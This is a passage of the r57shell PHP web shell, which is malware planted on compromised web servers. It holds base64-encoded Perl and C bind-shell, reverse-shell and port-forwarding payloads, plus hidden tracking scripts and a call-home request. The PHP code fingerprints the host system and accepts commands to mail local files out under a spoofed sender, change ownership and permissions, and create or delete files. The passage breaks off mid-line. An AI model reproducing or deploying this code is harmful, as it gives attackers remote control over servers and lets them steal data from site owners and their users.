+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow +0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ +HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo +gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm +lsZSk7DQogIHJldHVybiAwOw0KfQ=="; +$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I +CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl +bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU +gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol +NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC +iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy +aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ +SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 +xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ +WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN +CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 +yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi +I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc +m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp +IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ +lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW +QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; } +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo ws(3).'( '.perms(@fileperms($dir)).' )'; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir; +echo "<br></font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail") + { + $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); + mr($language,$res); + $_POST['cmd']=""; + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file'])) + { + if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; } + else + { + $filename = @basename($_POST['loc_file']); + $filedump = @fread($file,@filesize($_POST['loc_file'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + $attach = array( + "name"=>$filename, + "type"=>$mime_type, + "content"=>$filedump + ); + if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } + if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } + $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); + mr($language,$res); + $_POST['cmd']=""; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font 